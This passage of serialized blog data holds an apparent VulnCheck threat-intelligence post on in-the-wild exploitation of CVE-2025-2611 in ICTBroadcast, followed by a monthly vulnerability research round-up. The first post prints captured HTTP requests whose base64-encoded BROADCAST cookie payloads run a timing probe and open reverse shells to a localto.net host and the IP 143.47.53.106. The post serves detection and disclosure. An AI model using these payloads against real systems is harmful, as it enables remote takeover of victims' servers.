documented by Fortinet, suggesting possible reuse or shared tooling.\",\"Detections and intelligence are available. VulnCheck customers have access to Snort and Suricata signatures, as well as IP Intelligence, to help detect and mitigate this exploitation.\"]",[18,32245,32246],{},[68,32247],{"alt":32248,"src":32249},"CVE-2025-2611-kev","\u002Fblog\u002Fictbroadcast-kev\u002FCVE-2025-2611-kev.png",[61,32251,11273],{"id":11272},[18,32253,32254,32255,32258,32259,32263,32264,32269],{},"On October 11, we added ",[47,32256,23717],{"href":23715,"rel":32257},[51]," to the ",[47,32260,32262],{"href":10806,"rel":32261},[51],"VulnCheck Known Exploited Vulnerability Catalog"," (VulnCheck KEV) after observing attackers exploiting the vulnerability in the wild. 
CVE-2025-2611 is an unauthenticated command injection affecting ICTBroadcast, a call center software platform. The software, which should not be internet-facing, currently has a ",[47,32265,32268],{"href":32266,"rel":32267},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IklDVEJyb2FkY2FzdCI%3D",[51],"couple hundred"," instances online.",[18,32271,32272,32273,32276,32277,32282,32283,59],{},"The vulnerability was discovered by Valentin Lobstein (aka ",[47,32274,11008],{"href":11006,"rel":32275},[51],") and disclosed to the vendor in March 2025. Valentin later authored a ",[47,32278,32281],{"href":32279,"rel":32280},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F20446",[51],"Metasploit module"," after the vulnerability exceeded the 120-day disclosure deadline outlined in the ",[47,32284,32286],{"href":14795,"rel":32285},[51],"VulnCheck vulnerability disclosure policy",[61,32288,32290],{"id":32289},"attack-payloads","Attack Payloads",[18,32292,32293,32294,32297],{},"The attacks are occurring in two phases: first a time-based exploit check, then attempts to establish reverse shells. The vulnerability is a command injection affecting the ",[886,32295,32296],{},"BROADCAST"," cookie in the HTTP header.",[1354,32299,32302],{"className":32300,"code":32301,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost:\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}c2xlZXAgMw==|base64${IFS}-d|sh`\n",[886,32303,32301],{"__ignoreMap":219},[18,32305,32306,32307,32310,32311,32313,32314,32317],{},"The attacker uses a classic command-injection technique: base64-encoding the payload, decoding it with ",[886,32308,32309],{},"base64 -d",", then executing it with ",[886,32312,2186],{},". 
The payload above decodes to ",[886,32315,32316],{},"sleep 3"," and functions as a timing probe to confirm command execution.",[18,32319,32320,32321,13858,32324,4606],{},"Subsequent attacks used multiple methods to create reverse shells. From traditional ",[886,32322,32323],{},"mkfifo",[886,32325,30202],{},[1354,32327,32330],{"className":32328,"code":32329,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: \nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}bWtmaWZvIC90bXAvcGZnbWd6OyBuYyA4NXNwOWJleGoubG9jYWx0by5uZXQgMjI1MiAwPC90bXAvcGZnbWd6IHwgL2Jpbi9zaCA+L3RtcC9wZmdtZ3ogMj4mMTsgcm0gL3RtcC9wZmdtZ3o=|base64${IFS}-d|sh`\n",[886,32331,32329],{"__ignoreMap":219},[18,32333,32334,32335,32338],{},"To ",[886,32336,32337],{},"awk","-based solutions:",[1354,32340,32343],{"className":32341,"code":32342,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: \nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}YXdrICdCRUdJTntzPSIvaW5ldC90Y3AvMC8xNDMuNDcuNTMuMTA2LzIyNTIiO2Rve2lmKChzfCZnZXRsaW5lIGMpPD0wKWJyZWFrO2lmKGMpe3doaWxlKChjfCZnZXRsaW5lKT4wKXByaW50ICQwfCZzO2Nsb3NlKGMpfX0gd2hpbGUoYyE9ImV4aXQiKWNsb3NlKHMpfSc=|base64${IFS}-d|sh`\n",[886,32344,32342],{"__ignoreMap":219},[18,32346,32347,32348,32351],{},"And Python-based ",[886,32349,32350],{},"zlib"," compressed payloads:",[1354,32353,32356],{"className":32354,"code":32355,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: 13.201.61.210\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: 
BROADCAST=`echo${IFS}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|base64${IFS}-d|sh`\n",[886,32357,32355],{"__ignoreMap":219},[18,32359,32360,32361,32366,32367,13858,32369,32371,32372,32375,32376,32380,32381,32384],{},"The attacker used a ",[47,32362,32365],{"href":32363,"rel":32364},"https:\u002F\u002Flocaltonet.com\u002F",[51],"localto.net"," URL in the ",[886,32368,32323],{},[886,32370,30202],{}," payload, and also made connections to ",[886,32373,32374],{},"143.47.53.106"," in other payloads. Notably, these behaviors link the attacker to a campaign detailed by ",[47,32377,10492],{"href":32378,"rel":32379},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fmultilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware",[51]," in May 2025 where both this IP address and ",[886,32382,32383],{},"localtonet.com"," were used.",[61,32386,32388],{"id":32387},"artifacts-and-indicators","Artifacts and Indicators",[18,32390,32391,32392,32395,32396,32399],{},"VulnCheck ",[47,32393,1245],{"href":1243,"rel":32394},[51]," customers have had access to Snort and Suricata detections since early August, while ",[47,32397,1251],{"href":1249,"rel":32398},[51]," customers have received data on the exposed ICTBroadcast systems during the same period.",[993,32401,32403],{"id":32402},"observed-ips","Observed IPs",[22,32405,32406,32411],{},[25,32407,32408],{},[886,32409,32410],{},"86.104.249.106",[25,32412,32413],{},[886,32414,32374],{},[993,32416,32418],{"id":32417},"observed-domain","Observed 
Domain",[22,32420,32421],{},[25,32422,32423],{},[886,32424,32425],{},"85sp9bexj.localto.net",[61,32427,202],{"id":201},[18,32429,29952,32430,1246,32433,1255,32436,59],{},[47,32431,30353],{"href":30351,"rel":32432},[51],[47,32434,30358],{"href":30356,"rel":32435},[51],[47,32437,32017],{"href":32015,"rel":32438},[51],[18,32440,1228,32441,1234,32444,1240,32447,1246,32450,1255,32453,1260],{},[47,32442,1233],{"href":10806,"rel":32443},[51],[47,32445,1239],{"href":1237,"rel":32446},[51],[47,32448,1245],{"href":1243,"rel":32449},[51],[47,32451,1251],{"href":1249,"rel":32452},[51],[47,32454,216],{"href":1258,"rel":32455},[51],{"title":219,"searchDepth":220,"depth":220,"links":32457},[32458,32459,32460,32464],{"id":11272,"depth":220,"text":11273},{"id":32289,"depth":220,"text":32290},{"id":32387,"depth":220,"text":32388,"children":32461},[32462,32463],{"id":32402,"depth":1266,"text":32403},{"id":32417,"depth":1266,"text":32418},{"id":201,"depth":220,"text":202},"2025-10-14","Attackers are abusing an unauthenticated command injection bug in ICTBroadcast (CVE-2025-2611) to execute remote commands and drop reverse shells. 
VulnCheck caught the exploitation, linked it to related research, and had detections available for customers well before the activity began.",{"slug":32468},"ictbroadcast-kev","\u002Fblog\u002Fictbroadcast-kev",{"title":24026,"description":32466},"blog\u002Fictbroadcast-kev",[2941,242,1281,23275,1279],"cSr76mrprozTt3Hc3P6W3Veg0H-mHGiG9Xzl_F-CSOc",{"id":32475,"title":30353,"articles":7,"authors":32476,"body":32478,"date":33010,"description":33011,"extension":234,"image":7,"link":7,"meta":33012,"navigation":237,"path":33014,"seo":33015,"series":7,"stem":33016,"subtype":7,"tags":33017,"__hash__":33018},"blog\u002Fblog\u002Foctober-2025-research-highlights.md",[32477],{"name":256,"link":258,"avatar":257,"linkName":29813},{"type":15,"value":32479,"toc":33001},[32480,32486,32499,32502,32506,32509,32513,32516,32677,32690,32713,32716,32720,32727,32733,32742,32745,32751,32782,32799,32812,32816,32823,32826,32851,32894,32905,32909,32915,32922,32925,32952,32966,32973,32975,32984],[18,32481,32482],{},[68,32483],{":width":10862,"alt":32484,"src":32485},"October Emerging Threats","\u002Fblog\u002Foctober-2025-research-highlights\u002Foctober-2025-emerging-threats.png",[18,32487,32488,32489,32494,32495,32498],{},"Welcome to VulnCheck’s NEW monthly research round-up! Our vulnerability intelligence, initial access intelligence, and CVE Numbering Authority (CNA) teams collectively evaluate and produce thousands of pieces of vulnerability and exploit intelligence a month. 
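The BROADCAST-cookie injection described in the ICTBroadcast post above, with its `echo <b64>|base64 -d|sh` staging and `${IFS}` standing in for whitespace, is regular enough to flag and decode in a proxy or WAF log pipeline. What follows is an added example and not VulnCheck's own detection code or its Snort/Suricata signatures: it parses a raw HTTP request, pulls the `BROADCAST` cookie, flags shell metacharacters, decodes the base64 stage, classifies the decoded command as a timing probe or a reverse shell, and pulls out dotted host/IP tokens as indicator candidates. The function names (`analyze`, `b64_stage`, `build_request`) are this example's own, the sample requests are constructed inline and modeled on the captured payloads, and the `Host` value `192.0.2.10` is a documentation address, not a real target.

```python
"""Added example (not VulnCheck's detection code): flag and decode
CVE-2025-2611-style command injection in the ICTBroadcast BROADCAST cookie."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Shell metacharacters seen in the captured requests; a real session cookie
# should never contain any of these.
INJECTION_RE = re.compile(r"`|\$\(|\$\{IFS\}|\|\s*sh\b")
# The staging idiom: echo <b64>|base64 -d|sh, with ${IFS} or spaces as separators.
B64_STAGE_RE = re.compile(
    r"echo(?:\$\{IFS\}|\s+)([A-Za-z0-9+/=]+)\s*\|\s*base64(?:\$\{IFS\}|\s+)-d\s*\|\s*sh"
)
SLEEP_RE = re.compile(r"^\s*sleep\s+\d+\s*$")
REVERSE_SHELL_HINTS = ("mkfifo", "/dev/tcp", "/inet/tcp", "nc ", "socket(", "zlib")
# Dotted tokens: catches both hostnames and IPv4 addresses in the decoded command.
DOTTED_RE = re.compile(r"\b[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\b")


def parse_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into request line, header map, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def get_cookie(headers: Dict[str, str], name: str) -> Optional[str]:
    """Hand-rolled cookie split; http.cookies rejects values containing backticks."""
    for part in headers.get("cookie", "").split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def analyze(raw_request: str) -> Dict[str, object]:
    """Verdict for one request: suspicious flag, decoded stage, coarse class, IOCs."""
    verdict: Dict[str, object] = {
        "suspicious": False, "decoded": None,
        "classification": "benign", "indicators": [],
    }
    _, headers, _ = parse_request(raw_request)
    cookie = get_cookie(headers, "BROADCAST")
    if cookie is None or not INJECTION_RE.search(cookie):
        return verdict
    verdict["suspicious"] = True
    verdict["classification"] = "command-injection"
    decoded: Optional[str] = None
    match = B64_STAGE_RE.search(cookie)
    if match:
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = None
    verdict["decoded"] = decoded
    command = decoded if decoded is not None else cookie
    if decoded is not None and SLEEP_RE.match(decoded):
        verdict["classification"] = "timing-probe"
    elif any(hint in command for hint in REVERSE_SHELL_HINTS):
        verdict["classification"] = "reverse-shell"
    # De-duplicate while keeping first-seen order.
    indicators: List[str] = list(dict.fromkeys(DOTTED_RE.findall(command)))
    verdict["indicators"] = indicators
    return verdict


# --- constructed samples, modeled on the captured payloads -------------------
def build_request(cookie_value: str) -> str:
    # 192.0.2.10 is a documentation address, not a real ICTBroadcast host.
    return ("GET /login.php HTTP/1.1\r\nHost: 192.0.2.10\r\n"
            "User-Agent: Mozilla/5.0\r\n"
            f"Cookie: BROADCAST={cookie_value}\r\n\r\n")


def b64_stage(command: str) -> str:
    """Wrap a command the way the attacker did: backticks + ${IFS} + base64."""
    encoded = base64.b64encode(command.encode()).decode()
    return f"`echo${{IFS}}{encoded}|base64${{IFS}}-d|sh`"


SAMPLE_PROBE = build_request(b64_stage("sleep 3"))
SAMPLE_MKFIFO = build_request(b64_stage(
    "mkfifo /tmp/p; nc 85sp9bexj.localto.net 2252 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p"))
SAMPLE_AWK = build_request(b64_stage(
    "awk 'BEGIN{s=\"/inet/tcp/0/143.47.53.106/2252\";while((s|&getline c)>0)system(c)}'"))
SAMPLE_BENIGN = build_request("a1b2c3d4e5f6session")

if __name__ == "__main__":
    for label, sample in [("probe", SAMPLE_PROBE), ("mkfifo", SAMPLE_MKFIFO),
                          ("awk", SAMPLE_AWK), ("benign", SAMPLE_BENIGN)]:
        print(label, analyze(sample))
```

The metacharacter check alone is enough to alert; decoding the stage is what turns an alert into a triage-ready event, since the decoded command carries the callback host or IP that you pivot on (the page's `localto.net` domain and `143.47.53.106`). Keep the decode step tolerant: attackers can swap `base64 -d` for other stagers, so a failed decode still leaves the request flagged as `command-injection`.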
In the background, we’re also enhancing VulnCheck’s core products and shipping new ",[47,32490,32493],{"href":32491,"rel":32492},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#go-exploit-cache-adds-censys-platform-support",[51],"features"," for community resources like ",[47,32496,20558],{"href":14297,"rel":32497},[51],", our open-source exploit framework.",[18,32500,32501],{},"Staying on top of new vulnerabilities and threats is a Sisyphean task with increasingly high costs to teams and organizations. VulnCheck is committed to empowering the broader security community with best-in-class vulnerability and exploit data that’s well-vetted, machine-readable, and integration-ready out of the box. For more about us, visit vulncheck.com.",[61,32503,32505],{"id":32504},"the-stuff-you-couldnt-miss-recent-emerging-threats","The Stuff You Couldn’t Miss: Recent Emerging Threats",[18,32507,32508],{},"It’s easy for vulnerability news cycles to over-focus on zero-day flaws, but the past six weeks or so have seen some real bangers. If you’re a vulnerability responder who’s attuned to big swaths of enterprise software, you have our sympathy and respect for the last month and a half.",[993,32510,32512],{"id":32511},"recent-zero-day-vulnerabilities","Recent Zero-Day Vulnerabilities",[18,32514,32515],{},"Behold — a whole lot of classic initial access and extortion targets in one table, all exploited as zero-day and disclosed between the end of August and first few days of October. 
These weren’t the only 0days that hit the scene in September, but they were arguably the most impactful at scale.",[307,32517,32518,32536],{},[310,32519,32520],{},[313,32521,32522,32525,32528,32531,32533],{},[316,32523,32524],{},"Vulnerability",[316,32526,32527],{},"Impact",[316,32529,32530],{},"CVSS-B",[316,32532,328],{},[316,32534,32535],{},"Public PoC",[336,32537,32538,32559,32578,32604,32627,32649],{},[313,32539,32540,32548,32551,32554,32557],{},[341,32541,32542,32547],{},[47,32543,32546],{"href":32544,"rel":32545},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-7775",[51],"CVE-2025-7775",": Citrix NetScaler memory overflow",[341,32549,32550],{},"RCE",[341,32552,32553],{},"9.2",[341,32555,32556],{},"Unattributed",[341,32558,359],{},[313,32560,32561,32569,32571,32574,32576],{},[341,32562,32563,32568],{},[47,32564,32567],{"href":32565,"rel":32566},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20352",[51],"CVE-2025-20352",": Cisco IOS and IOS XE stack-based buffer overflow",[341,32570,32550],{},[341,32572,32573],{},"7.7",[341,32575,32556],{},[341,32577,359],{},[313,32579,32580,32588,32590,32593,32601],{},[341,32581,32582,32587],{},[47,32583,32586],{"href":32584,"rel":32585},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20333",[51],"CVE-2025-20333",": Cisco ASA and FTD classic buffer overflow",[341,32589,32550],{},[341,32591,32592],{},"9.9",[341,32594,32595,32596,2230],{},"UAT4356 (",[47,32597,32600],{"href":32598,"rel":32599},"https:\u002F\u002Fblog.talosintelligence.com\u002Farcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices\u002F",[51],"ArcaneDoor",[341,32602,32603],{},"Partial",[313,32605,32606,32614,32617,32620,32625],{},[341,32607,32608,32613],{},[47,32609,32612],{"href":32610,"rel":32611},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20362",[51],"CVE-2025-20362",": Cisco ASA and FTD missing authorization",[341,32615,32616],{},"Auth 
bypass",[341,32618,32619],{},"6.5",[341,32621,32595,32622,2230],{},[47,32623,32600],{"href":32598,"rel":32624},[51],[341,32626,383],{},[313,32628,32629,32637,32639,32641,32647],{},[341,32630,32631,32636],{},[47,32632,32635],{"href":32633,"rel":32634},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-10035",[51],"CVE-2025-10035",": Fortra GoAnywhere MFT command injection",[341,32638,32550],{},[341,32640,24698],{},[341,32642,32643],{},[47,32644,941],{"href":32645,"rel":32646},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fstorm-1175",[51],[341,32648,32603],{},[313,32650,32651,32659,32661,32663,32675],{},[341,32652,32653,32658],{},[47,32654,32657],{"href":32655,"rel":32656},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-61882",[51],"CVE-2025-61882",": Oracle E-Business Suite remote code execution",[341,32660,32550],{},[341,32662,3699],{},[341,32664,32665,1246,32670],{},[47,32666,32669],{"href":32667,"rel":32668},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fta505",[51],"Graceful Spider",[47,32671,32674],{"href":32672,"rel":32673},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fransomware?ransomware=Clop",[51],"Cl0p",[341,32676,383],{},[18,32678,32679,32680,32684,32685,59],{},"The top four vulnerabilities in the table above are thus far only known to be exploited in a limited fashion by adversaries. The last two are a different story: Exact details are still murky on ",[47,32681,32635],{"href":32682,"rel":32683},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft",[51],", a CVSS-10 vulnerability in Fortra file transfer software GoAnywhere MFT that VulnCheck and two other research teams came to similar conclusions upon analyzing: Exploitation didn’t appear to be possible without access to a private key. 
Initially VulnCheck’s research team thought it was possible that a weird internal developer bug of some sort accidentally got disclosed with a max-severity score (it happens!); then reports of zero-day exploitation started surfacing from sources who weren’t the vendor — one of which included ",[47,32686,32689],{"href":32687,"rel":32688},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F10\u002F06\u002Finvestigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability\u002F",[51],"ransomware deployment",[18,32691,32692,32693,32698,32699,32703,32704,32707,32708,59],{},"Finally, as September came to a close, Oracle customers ",[47,32694,32697],{"href":32695,"rel":32696},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",[51],"began reporting extortion emails"," claiming to be from Cl0p (or ",[47,32700,32702],{"href":32672,"rel":32701},[51],"Clop","), a financially motivated threat group well-known for using complex exploit chains to access and exfiltrate large volumes of data from victim systems. Cl0p confirmed their involvement in a campaign they implied made use of one or more zero-day vulnerabilities; then, in a groan-inducing turn that many enterprise organizations probably wish they could have ignored, a rival threat group released the full exploit that Cl0p appears to have deployed in a large-scale attack dating back at least two months. The exploit leverages ",[47,32705,32657],{"href":32655,"rel":32706},[51],", a net-new zero-day vulnerability in Oracle E-Business Suite (EBS) that comprises at least four or five different weaknesses rather than being a single issue. 
Mass exploitation is ",[47,32709,32712],{"href":32710,"rel":32711},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fblog\u002Fcrowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882\u002F",[51],"now being reported",[18,32714,32715],{},"All of the CVEs above are on VulnCheck’s Known Exploited Vulnerabilities (KEV) list.",[61,32717,32719],{"id":32718},"notable-vulncheck-kev-additions","Notable VulnCheck KEV Additions",[18,32721,32722,32723,32726],{},"Speaking of KEV! ",[47,32724,1233],{"href":1231,"rel":32725},[51]," added 54 vulnerabilities in September 2025 after evidence of exploitation was published for the first time. Roughly 78% of these (42 CVEs) weren’t yet on CISA KEV as of October 2, 2025. We also incorporated an additional 47 CVEs into VulnCheck KEV based on historical evidence we discovered while researching older exploits and data sources.",[18,32728,32729],{},[68,32730],{":width":10862,"alt":32731,"src":32732},"VulnCheck KEV October","\u002Fblog\u002Foctober-2025-research-highlights\u002Fvulncheck-kev-oct-2025-additions.png",[18,32734,32735,32736,10515,32738,32741],{},"CISA added 16 CVEs to CISA KEV in September. Of these, 11 were added to VulnCheck KEV at least a day ahead of CISA KEV inclusion. 
",[295,32737,31357],{},[47,32739,1233],{"href":1231,"rel":32740},[51]," is free and open to the security community.",[18,32743,32744],{},"While September was a busy month for emerging threats, read on for a few of our favorite recent KEV stories.",[18,32746,32747],{},[68,32748],{":width":10862,"alt":32749,"src":32750},"TP-Link Timeline","\u002Fblog\u002Foctober-2025-research-highlights\u002Ftp-link-timeline.png",[18,32752,32753,32766,32767,32772,32773,32778,32779],{},[295,32754,32755,32756,982,32761,4606],{},"TP-Link ",[47,32757,32760],{"href":32758,"rel":32759},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-50224",[51],"CVE-2023-50224",[47,32762,32765],{"href":32763,"rel":32764},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-9377",[51],"CVE-2025-9377"," After discussing TP-Link security over lunch with ",[47,32768,32771],{"href":32769,"rel":32770},"https:\u002F\u002Fx.com\u002Ftomlawrencetech",[51],"Tom Lawrence",", VulnCheck researcher Patrick Garrity started looking at old TP-Link advisories. In the process, he stumbled across historical exploitation evidence that tied two TP-Link vulnerabilities to the 7777 botnet — one of which (CVE-2023-50224) we added to VulnCheck KEV on August 21. The other vulnerability had no CVE when VulnCheck reviewed the evidence, but was assigned CVE-2025-9377 several days later. TP-Link ",[47,32774,32777],{"href":32775,"rel":32776},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Ffaq\u002F4365\u002F",[51],"updated their advisory",", and both CVEs were added to CISA KEV on September 3. It’s unclear if that was a lucky coincidence or if VulnCheck’s KEV addition triggered new CISA and vendor awareness of vulnerabilities that were previously overlooked. 
",[1131,32780,32781],{},"Ed: Patrick’s bet is on the latter!",[18,32783,32784,32792,32793,32798],{},[295,32785,32786,32787,4606],{},"Sitecore ",[47,32788,32791],{"href":32789,"rel":32790},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-53690",[51],"CVE-2025-53690"," On the surface, this is a deserialization vulnerability in Sitecore XM, XP, XC, and Managed Cloud deployments. Under the covers, it turns out that old (2017) Sitecore docs included a sample machine key for learning purposes, some Sitecore customers chose to use that key in production, and threat actors found out and exploited it. Mandiant has a ",[47,32794,32797],{"href":32795,"rel":32796},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fviewstate-deserialization-zero-day-vulnerability",[51],"write-up"," noting that despite the wildly insecure customer configuration choice, the unattributed threat actors had “deep understanding” of the compromised product.",[18,32800,32801,32802,32807,32808,32811],{},"Other notable additions include Cisco Small Business router ",[47,32803,32806],{"href":32804,"rel":32805},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-20705",[51],"CVE-2022-20705"," and Shenzhen Aitemi M300 ",[47,32809,24149],{"href":24147,"rel":32810},[51],", both of which had botnet activity observed in recent weeks and have exploits available for VulnCheck initial access intelligence customers.",[61,32813,32815],{"id":32814},"initial-access-intelligence-and-go-exploit-highlights","Initial access intelligence and go-exploit highlights",[18,32817,32818,32819,32822],{},"VulnCheck’s ",[47,32820,1245],{"href":1243,"rel":32821},[51]," team creates exploits, detections, queries, and more for vulnerabilities that can be used as initial access vectors. 
The team covered 25+ new CVEs over the past month, most of which include PCAPs, network rules, and ASM search engine queries for initial access customers.",[18,32824,32825],{},"In addition to signature and PCAP coverage for recent threats like Cisco ASA and Oracle EBS, our research team snuck in some interesting post-auth exploits in September. Those include:",[22,32827,32828,32842],{},[25,32829,32830,32831,982,32836,32841],{},"Original post-auth exploits for N-able N-central ",[47,32832,32835],{"href":32833,"rel":32834},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8875",[51],"CVE-2025-8875",[47,32837,32840],{"href":32838,"rel":32839},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8876",[51],"CVE-2025-8876",", both of which were added to CISA KEV as zero-days in August but had virtually no other information available. N-central is a remote monitoring and management (RMM) platform, a technology category that attackers are fond of abusing. Nearly two months post-disclosure, both FOFA and ZoomEye still show a few thousand internet-exposed instances of N-central, mostly in North America.",[25,32843,32844,32845,32850],{},"A weaponized exploit for ",[47,32846,32849],{"href":32847,"rel":32848},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-58443",[51],"CVE-2025-58443"," in FOG open-source cloning and inventory management software, which has a small internet footprint but is more often used internally for labs and other shared systems. The team’s exploit allows for unauthenticated database recovery and password hash access; the “shared system” deployment pattern also means that theoretically, there’s potential for wormability. 
CVE-2025-58443 isn't known to be exploited in the wild yet, but proof-of-concept exploit code is publicly available.",[18,32852,32853,32854,1246,32859,32864,32865,1246,32870,32875,32876,32881,32882,32887,32888,32893],{},"Other more traditional initial access exploit coverage was also released in September for ",[47,32855,32858],{"href":32856,"rel":32857},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-19#cve-2025-57819-freepbx-endpoint-manager-authentication-bypass-to-sql-injection-rce",[51],"FreePBX",[47,32860,32863],{"href":32861,"rel":32862},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-19#cve-2025-5095-burk-technology-arc-solo-authentication-bypass-admin-password-reset",[51],"Burk Technology ARC Solo"," ICS devices, generative AI platform ",[47,32866,32869],{"href":32867,"rel":32868},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-26#cve-2025-58434-flowiseai-flowise-password-reset-token-account-takeover",[51],"Flowise",[47,32871,32874],{"href":32872,"rel":32873},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-05#cve-2024-51092-librenms-hostname-command-injection",[51],"LibreNMS",", and a quartet of Fortinet FortiSIEM ",[47,32877,32880],{"href":32878,"rel":32879},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#cve-2024-23109-fortinet-fortisiem-command-injection",[51],"command injection vulnerabilities",", to name just a few. 
Customers interested in the Cisco ASA and ASDM ecosystem might also be interested in ",[47,32883,32886],{"href":32884,"rel":32885},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#cve-2021-1585-cisco-asdm-launcher-rce-via-malicious-software-package-download",[51],"a recent exploit"," the team added for Cisco ASDM ",[47,32889,32892],{"href":32890,"rel":32891},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-1585",[51],"CVE-2021-1585",", a well-known RCE vulnerability still present in the latest version of the ASDM launcher.",[18,32895,32896,32897,32901,32902,59],{},"Want to follow along with initial access exploits and vulnerabilities? Check out the team’s weekly threat-oriented ",[47,32898,14853],{"href":32899,"rel":32900},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access",[51]," or learn more ",[47,32903,305],{"href":1243,"rel":32904},[51],[61,32906,32908],{"id":32907},"vulncheck-cna-issuing-cves-to-surface-hidden-risk","VulnCheck CNA: Issuing CVEs to Surface Hidden Risk",[18,32910,32911],{},[68,32912],{":width":10862,"alt":32913,"src":32914},"VulnCheck CNA October","\u002Fblog\u002Foctober-2025-research-highlights\u002Fvulncheck-cna-activity.png",[18,32916,32917,32918,32921],{},"As one of the CVE world’s major research CNAs, VulnCheck ",[295,32919,32920],{},"assigned 60 new CVEs"," in September for vulnerabilities that were either reported to us by third-party researchers or discovered in our team’s analysis of exploited, weaponized, or otherwise-public vulnerabilities without CVE identifiers.",[18,32923,32924],{},"Of those 60 new CVE assignments:",[22,32926,32927,32935,32938],{},[25,32928,32929,32930,32934],{},"55 came through external security researchers who engaged VulnCheck CNA’s “",[47,32931,32933],{"href":2999,"rel":32932},[51],"Report a Vulnerability","” service that conducts coordinated vulnerability disclosure (CVD) outreach with vendors on behalf of researchers.",[25,32936,32937],{},"15 were issues with 
